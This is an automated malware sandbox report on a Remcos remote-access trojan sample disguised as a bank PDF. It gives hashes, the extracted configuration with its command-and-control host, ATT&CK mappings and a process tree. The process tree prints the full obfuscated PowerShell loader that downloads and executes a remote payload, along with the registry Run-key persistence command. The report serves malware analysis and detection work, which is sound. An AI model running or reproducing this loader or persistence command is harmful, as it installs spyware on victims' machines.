remcos | c9077e1e771d75dff78d9041f97b8ec5d716eaffeb65d79f1669a19d78013ee1

General

Target

BNPParibas,pdf.vbs
Size

32KB
MD5

dfc5b784b17dff57cbad43dbf6fb582d
SHA1

addde7ad819450c10a67e39d8f49518821f6c296
SHA256

bb453ff3ce310b04ecfe93ff0f3ad8edf939c81a0c94a30842e9404804a3fd64
SHA512

81d57427dfc0b8703cb394e5444ec1dfa531f4a02e829c79f1dc623538a2ee0b57daa5b83ba66b9445b27736945f6ea6ca9c9620a0747783adac9719e0c9f49a
SSDEEP

768:qeifDS82ZBNPMng2vSJiqB1uTmTFGLvM1o5nU4Yhtt:MfDiDNkzSJpracAM1GU4Yhtt

Score

10^/10

remcos megida discovery execution persistence rat

Malware Config

Extracted

Family

remcos

Botnet

megida

C2

latestrem.duckdns.org:52190

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-I12ONC
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 6 IoCs

flow	pid	Process
4	3684	WScript.exe
22	2488	powershell.exe
35	5664	msiexec.exe
41	5664	msiexec.exe
50	5664	msiexec.exe
54	5664	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Jorddag = "%Rdlg% -windowstyle 1 $Skbnefllesskab=(gi 'HKCU:\\Software\\Unglowering\\').GetValue('Rawlplug');%Rdlg% ($Skbnefllesskab)"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2488	powershell.exe
5404	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
5664	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
5404	powershell.exe
5664	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2488	powershell.exe
2488	powershell.exe
5404	powershell.exe
5404	powershell.exe
5404	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5664	msiexec.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
5404	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2488	powershell.exe
Token: SeDebugPrivilege	5404	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5664	msiexec.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 3684 wrote to memory of 2488	3684	WScript.exe	90
PID 3684 wrote to memory of 2488	3684	WScript.exe	90
PID 5404 wrote to memory of 5664	5404	powershell.exe	100
PID 5404 wrote to memory of 5664	5404	powershell.exe	100
PID 5404 wrote to memory of 5664	5404	powershell.exe	100
PID 5404 wrote to memory of 5664	5404	powershell.exe	100
PID 5664 wrote to memory of 3076	5664	msiexec.exe	102
PID 5664 wrote to memory of 3076	5664	msiexec.exe	102
PID 5664 wrote to memory of 3076	5664	msiexec.exe	102
PID 3076 wrote to memory of 3080	3076	cmd.exe	104
PID 3076 wrote to memory of 3080	3076	cmd.exe	104
PID 3076 wrote to memory of 3080	3076	cmd.exe	104

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BNPParibas,pdf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Smaaskndes='func';Get-History;$Smaaskndes+='t';Get-History;$Smaaskndes+='i';$Bogladepriser=Get-History;$Smaaskndes+='on:';$Bogladepriser=Get-History;(ni -p $Smaaskndes -n Meandrite -value { param($Caponummeret);$Triumferes=1;do {$Urovarslingers+=$Caponummeret[$Triumferes];$Triumferes+=2} until(!$Caponummeret[$Triumferes])$Urovarslingers});(ni -p $Smaaskndes -n Comaens -value {param($Collapsar);.($Negroes) ($Collapsar)});ConvertTo-Html;$Mosen=Meandrite ' NFE,tK..W';$Mosen+=Meandrite 'PE bBCUlNICEun t';$Skrumples=Meandrite ' M onzJiAlLlMaA/';$Kasinoets=Meandrite 'FT lMsE1 2';$Apurpose=' [PnTeOtH.DsKE r V i CUeFPAO I.NTtSmBA nAAAGLeOrF]G:D: sAE c u,r iCtSyCpRRMO,T,o cSOMl =T$PKCA SHi nCOUE TRs';$Skrumples+=Meandrite ' 5O..0 (IW i nSdSo w sO AN T 1,0..K0 ;U WPiDnK6,4 ;B CxF6 4 ;D .r,v :T1W3N4 .S0R). ,GKeTcUk o,/E2D0 1 0 0C1 0,1 F iHrAeDf o.x,/ 1 3T4H.P0';$Undecyl=Meandrite 'Eu s,eCRp- aDgTesNPT';$Pickery=Meandrite ' h tHtSp sK: / /Sw.wCw . tEr.a nMsGp.a.r.eUnMcFiBaCq uViSl lAoNtUa.. cFlO/ RSiCt,h eS.RmPs i';$Foreknowledges=Meandrite ' >';$Negroes=Meandrite ' iBEKX';$Besnakkedes='Eure';$Shindig='\Svulsterne.Cau';Comaens (Meandrite 'S$ G L O b a l : dARHnU= $,E N V : AAPFP,D ARTDA +D$SSJhSiSn d,IGG');Comaens (Meandrite ' $ GSl OMBIAbL :GaFBCO nFN,eAMPECn t SKOWm R A AKD eDT.=A$ PBIWc k eLrDy .AS.p L iSt,( $JfPo rPE,k N.O.w lEEDd G.e sF)');Comaens (Meandrite $Apurpose);$Pickery=$abonnementsomraadet[0];$Diphyes=(Meandrite ' $FgLL o bSaUL.:VhIuMNSdSe sPL D.EPrMNUeDsF=DN eAw -Doyb jfetC tD HSNyPs.TSESmZ.O$LMUO sPE n');Comaens ($Diphyes);Comaens (Meandrite 'V$,H uFnPd eHsDl dGeBrNnBe sH. HPeSa d,eOr sR[S$RU nSd eRcBy,l ]U= $HS kBr,u.m,pPlSeTs');$Materializee=Meandrite 'FD o wLnWlUo a dTF i lne';$Planck=Meandrite 'U$RHnuInDd eGs lEdWe rLnIe,sF. $KM a t e,rPiBaTl i.z e e .NIHn vFo kPe (Y$PP iRc.kHe r,yA,O$.sSaTa s.)';$saas=$Drn;Comaens (Meandrite 'B$FgSlUO BJA lD: NLO nLoLBFSHE rTVFaKtSIFOSN,=D(TtFE.SSTa-NPHA T H $ s AEA sB)');while (!$Nonobservation) {Comaens (Meandrite 'S$ gGl.oWbFaFl :SO tfo n e uSr o lAoMgHyX=E$,U.dGf,aBlSd sFvIiPn kcl e rUn e s') ;Comaens $Planck;Comaens (Meandrite 't[ t HLrSeEACd,IBN g . t H rTE a dM].:H:,SDLPeREPPG(.4 0 0B0K)');Comaens (Meandrite ' $,gAlSoTb A lN:.N OCNRo b S E R.VVA Tsi oKn =v( tGeKs td- p a TRH P$LS aIA SB)') ;Comaens (Meandrite 'A$PGBlAODBhaML :UogvDEfr S TBR EAG = $SgOl oGB a lz: B R n D E h u,gRgreNR NMEV+u+E%S$ ASb.OAnLn ESmLePNUT s OBm rBAKa,d ERT .Pc O,u NDT') ;$Pickery=$abonnementsomraadet[$Overstreg]}$Fibrocartilaginous=384348;$Brnebegrnsnings=27779;Comaens (Meandrite ' $ GSlmOJB,A Ls: E,u cDh a.R iDS t,i CAaTlFlQYV H= gTE T.- C ODN ttETn,TV B$ sSA.A,s');Comaens (Meandrite 'H$AgFlBoEbHa l :UTBj rUnSeT =G [,S ySsMt eLmC. C ojnUv eSrPt ] : :LFUr oAm,BVa,s eN6U4 S tRr i,n,gt(d$ E uIc h,aVr iSsGt i c a.lGl y )');Comaens (Meandrite 'B$ g LIo B a l : g uIN sDtCi.g e.rSe T=. T[SS.Y sMTREHM..LtUESx T .iE N cHoTd iUnUg,]E:.:Ea,S cMI,iS.Ug.E T S t RKISNHg (.$,TUJ R n E )');Comaens (Meandrite 'S$ gSLSO,bSA l :OWSoNr KNYK= $PG UbNPs.T I g e r EG.Es U b.s T r iONMGO(S$Tf IBb.rSoMcAA rSTdIUlKa.g iKn OMu s ,S$KBarBnPeIb e g RSn s.N i nTg S,)');Comaens $Worky;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2488

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Smaaskndes='func';Get-History;$Smaaskndes+='t';Get-History;$Smaaskndes+='i';$Bogladepriser=Get-History;$Smaaskndes+='on:';$Bogladepriser=Get-History;(ni -p $Smaaskndes -n Meandrite -value { param($Caponummeret);$Triumferes=1;do {$Urovarslingers+=$Caponummeret[$Triumferes];$Triumferes+=2} until(!$Caponummeret[$Triumferes])$Urovarslingers});(ni -p $Smaaskndes -n Comaens -value {param($Collapsar);.($Negroes) ($Collapsar)});ConvertTo-Html;$Mosen=Meandrite ' NFE,tK..W';$Mosen+=Meandrite 'PE bBCUlNICEun t';$Skrumples=Meandrite ' M onzJiAlLlMaA/';$Kasinoets=Meandrite 'FT lMsE1 2';$Apurpose=' [PnTeOtH.DsKE r V i CUeFPAO I.NTtSmBA nAAAGLeOrF]G:D: sAE c u,r iCtSyCpRRMO,T,o cSOMl =T$PKCA SHi nCOUE TRs';$Skrumples+=Meandrite ' 5O..0 (IW i nSdSo w sO AN T 1,0..K0 ;U WPiDnK6,4 ;B CxF6 4 ;D .r,v :T1W3N4 .S0R). ,GKeTcUk o,/E2D0 1 0 0C1 0,1 F iHrAeDf o.x,/ 1 3T4H.P0';$Undecyl=Meandrite 'Eu s,eCRp- aDgTesNPT';$Pickery=Meandrite ' h tHtSp sK: / /Sw.wCw . tEr.a nMsGp.a.r.eUnMcFiBaCq uViSl lAoNtUa.. cFlO/ RSiCt,h eS.RmPs i';$Foreknowledges=Meandrite ' >';$Negroes=Meandrite ' iBEKX';$Besnakkedes='Eure';$Shindig='\Svulsterne.Cau';Comaens (Meandrite 'S$ G L O b a l : dARHnU= $,E N V : AAPFP,D ARTDA +D$SSJhSiSn d,IGG');Comaens (Meandrite ' $ GSl OMBIAbL :GaFBCO nFN,eAMPECn t SKOWm R A AKD eDT.=A$ PBIWc k eLrDy .AS.p L iSt,( $JfPo rPE,k N.O.w lEEDd G.e sF)');Comaens (Meandrite $Apurpose);$Pickery=$abonnementsomraadet[0];$Diphyes=(Meandrite ' $FgLL o bSaUL.:VhIuMNSdSe sPL D.EPrMNUeDsF=DN eAw -Doyb jfetC tD HSNyPs.TSESmZ.O$LMUO sPE n');Comaens ($Diphyes);Comaens (Meandrite 'V$,H uFnPd eHsDl dGeBrNnBe sH. HPeSa d,eOr sR[S$RU nSd eRcBy,l ]U= $HS kBr,u.m,pPlSeTs');$Materializee=Meandrite 'FD o wLnWlUo a dTF i lne';$Planck=Meandrite 'U$RHnuInDd eGs lEdWe rLnIe,sF. $KM a t e,rPiBaTl i.z e e .NIHn vFo kPe (Y$PP iRc.kHe r,yA,O$.sSaTa s.)';$saas=$Drn;Comaens (Meandrite 'B$FgSlUO BJA lD: NLO nLoLBFSHE rTVFaKtSIFOSN,=D(TtFE.SSTa-NPHA T H $ s AEA sB)');while (!$Nonobservation) {Comaens (Meandrite 'S$ gGl.oWbFaFl :SO tfo n e uSr o lAoMgHyX=E$,U.dGf,aBlSd sFvIiPn kcl e rUn e s') ;Comaens $Planck;Comaens (Meandrite 't[ t HLrSeEACd,IBN g . t H rTE a dM].:H:,SDLPeREPPG(.4 0 0B0K)');Comaens (Meandrite ' $,gAlSoTb A lN:.N OCNRo b S E R.VVA Tsi oKn =v( tGeKs td- p a TRH P$LS aIA SB)') ;Comaens (Meandrite 'A$PGBlAODBhaML :UogvDEfr S TBR EAG = $SgOl oGB a lz: B R n D E h u,gRgreNR NMEV+u+E%S$ ASb.OAnLn ESmLePNUT s OBm rBAKa,d ERT .Pc O,u NDT') ;$Pickery=$abonnementsomraadet[$Overstreg]}$Fibrocartilaginous=384348;$Brnebegrnsnings=27779;Comaens (Meandrite ' $ GSlmOJB,A Ls: E,u cDh a.R iDS t,i CAaTlFlQYV H= gTE T.- C ODN ttETn,TV B$ sSA.A,s');Comaens (Meandrite 'H$AgFlBoEbHa l :UTBj rUnSeT =G [,S ySsMt eLmC. C ojnUv eSrPt ] : :LFUr oAm,BVa,s eN6U4 S tRr i,n,gt(d$ E uIc h,aVr iSsGt i c a.lGl y )');Comaens (Meandrite 'B$ g LIo B a l : g uIN sDtCi.g e.rSe T=. T[SS.Y sMTREHM..LtUESx T .iE N cHoTd iUnUg,]E:.:Ea,S cMI,iS.Ug.E T S t RKISNHg (.$,TUJ R n E )');Comaens (Meandrite 'S$ gSLSO,bSA l :OWSoNr KNYK= $PG UbNPs.T I g e r EG.Es U b.s T r iONMGO(S$Tf IBb.rSoMcAA rSTdIUlKa.g iKn OMu s ,S$KBarBnPeIb e g RSn s.N i nTg S,)');Comaens $Worky;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5404
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:5664
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Jorddag" /t REG_EXPAND_SZ /d "%Rdlg% -windowstyle 1 $Skbnefllesskab=(gi 'HKCU:\Software\Unglowering\').GetValue('Rawlplug');%Rdlg% ($Skbnefllesskab)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3076
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Jorddag" /t REG_EXPAND_SZ /d "%Rdlg% -windowstyle 1 $Skbnefllesskab=(gi 'HKCU:\Software\Unglowering\').GetValue('Rawlplug');%Rdlg% ($Skbnefllesskab)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:3080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
78a0cfabb0401163e22cba42716db6d6

SHA1
a4b3b39d2fd27cfebd41d9230769d7d95cd363b4

SHA256
1549aca65053bce7610e96d9f29a8e91cab9b5c6bea973eabd772e1a4a9c3ef8

SHA512
aca9accdc81f6ddbfdc42065722b098485264ff099e1c0383ddc3498e4ea352114fbdc6a6cacfa748e09b51f1bd4f8f19fa557b0e9385ef94aa8a8bddb790d50

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
230B

MD5
e86b0e6e59c0c426de2b582876f8146b

SHA1
7e87d48150e88f942844e16a27e136d7e8d4b2ac

SHA256
553f9d053afa278a1e9b93c6fccc6c15fdd1437bea29d4c61e43c475b32ca162

SHA512
6b58ab95f5a325cdbe1b6c2a06928cec93fe9ed4a4145aeac3ececd98525937d6034ce32720a6e4f44aa339c4bfaae3674e258cf0aeec534d1a920dff6a9ba4e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d99f982b74ae223eab2b2e8d91de6a7e

SHA1
b74375d939615908053b8c59882cfb1f7cce777d

SHA256
c3771e3c0b6ee9c0032981828ae319c562bd7d664b3077b5c2a4e3f8d6044e80

SHA512
78ba7cf1da7f264e8313e7e4eca67a9fcb575aa9f4040025b1c184b647a61d4df4edbe8157a4396d112264b319cb88dd4be4a1e8ad3d032452aba56dc993f529

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k4etgfc5.xyw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Svulsterne.Cau

Filesize
536KB

MD5
b627c1952693e488e514ffb92633e80b

SHA1
7aca9e0681ffd7895b3b933a7de9a4b644d3b62d

SHA256
28505c5221958bcd1501c44f2cfe8556a99384177e76bb51064733f0521be2ce

SHA512
42aa53d79d549a005b4eef4fb6db28505f61576776c6b1649a4a0842f97d21a9385a1aca18d6dd5041b44ef6ba4bbc8bb4c5ed17dd351fbf1b26c91b82392858

Download Submit
memory/2488-20-0x00007FF8D6EC0000-0x00007FF8D7981000-memory.dmp

Filesize
10.8MB

Download
memory/2488-19-0x00007FF8D6EC3000-0x00007FF8D6EC5000-memory.dmp

Filesize
8KB

Download
memory/2488-22-0x00007FF8D6EC0000-0x00007FF8D7981000-memory.dmp

Filesize
10.8MB

Download
memory/2488-21-0x00007FF8D6EC0000-0x00007FF8D7981000-memory.dmp

Filesize
10.8MB

Download
memory/2488-23-0x00007FF8D6EC0000-0x00007FF8D7981000-memory.dmp

Filesize
10.8MB

Download
memory/2488-26-0x00007FF8D6EC0000-0x00007FF8D7981000-memory.dmp

Filesize
10.8MB

Download
memory/2488-16-0x00007FF8D6EC0000-0x00007FF8D7981000-memory.dmp

Filesize
10.8MB

Download
memory/2488-15-0x00007FF8D6EC0000-0x00007FF8D7981000-memory.dmp

Filesize
10.8MB

Download
memory/2488-14-0x000001B72D9F0000-0x000001B72DA12000-memory.dmp

Filesize
136KB

Download
memory/2488-4-0x00007FF8D6EC3000-0x00007FF8D6EC5000-memory.dmp

Filesize
8KB

Download
memory/5404-30-0x0000000005170000-0x00000000051D6000-memory.dmp

Filesize
408KB

Download
memory/5404-47-0x0000000006590000-0x00000000065B2000-memory.dmp

Filesize
136KB

Download
memory/5404-31-0x00000000058E0000-0x0000000005946000-memory.dmp

Filesize
408KB

Download
memory/5404-43-0x0000000006030000-0x000000000604E000-memory.dmp

Filesize
120KB

Download
memory/5404-44-0x0000000006060000-0x00000000060AC000-memory.dmp

Filesize
304KB

Download
memory/5404-45-0x0000000006FF0000-0x0000000007086000-memory.dmp

Filesize
600KB

Download
memory/5404-46-0x0000000006540000-0x000000000655A000-memory.dmp

Filesize
104KB

Download
memory/5404-41-0x0000000005A10000-0x0000000005D64000-memory.dmp

Filesize
3.3MB

Download
memory/5404-48-0x00000000076A0000-0x0000000007C44000-memory.dmp

Filesize
5.6MB

Download
memory/5404-49-0x00000000082D0000-0x000000000894A000-memory.dmp

Filesize
6.5MB

Download
memory/5404-29-0x00000000050D0000-0x00000000050F2000-memory.dmp

Filesize
136KB

Download
memory/5404-51-0x0000000008950000-0x000000000D8C8000-memory.dmp

Filesize
79.5MB

Download
memory/5404-27-0x0000000002670000-0x00000000026A6000-memory.dmp

Filesize
216KB

Download
memory/5404-28-0x0000000005240000-0x0000000005868000-memory.dmp

Filesize
6.2MB

Download
memory/5664-56-0x0000000000D20000-0x0000000001F74000-memory.dmp

Filesize
18.3MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads